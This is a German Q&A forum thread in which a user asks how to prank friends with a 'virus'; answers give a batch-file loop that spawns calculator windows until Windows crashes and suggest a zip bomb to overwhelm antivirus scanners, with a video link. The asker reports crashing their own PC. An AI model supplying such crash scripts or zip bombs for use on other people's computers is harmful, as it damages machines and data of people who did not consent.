FReunde mit virus verarschen

2 Antworten

Vom Fragesteller als hilfreich ausgezeichnet

MAch einfach folgendes Erstell ein Textdokument und schreib in dieses

:1
start calc.exe
GoTo 1

das Textdokument speicherst du dann unter name.BAT

Öffnest du diese bat datei dürfte dein rechner mit ziemlicher sicherheit abschmiern (nachm neutsart is alles wieder gut) :DD

auch dir vielen dank ich habs ausprobiert .... er is auch abgeschmiert läuft jetzt aber wieder wie immer

Wüsstest du jetzt vllt noch ob/wie man dass so machen könnte, dass das cmd fenster nicht geöffnet wird sondern ein eigenes (mit eigenem text )

0

Besser noch:mach eine zipBombe^^ dann legen sich virenscanner und windows selbst lahm wenn sie die datei scannen wollen-anleitung:google: "zipbombe"
keine sorge, nach nem neustart sollte alles wieder funktionieren (denk ich)

Danke für die antwort wüsstest du vllt irgendjemanden der sich so mit programmieren ein bischen auskennt und mir sowas vllt erklären könnte ?

0
@oli1807

da muss man garnicht wirklich programmieren können.du musst nur mit winrar umgehen können ;)
hier mal ein paar links dazu: "http://www.youtube.com/watch?v=96N_3Gd3bEU"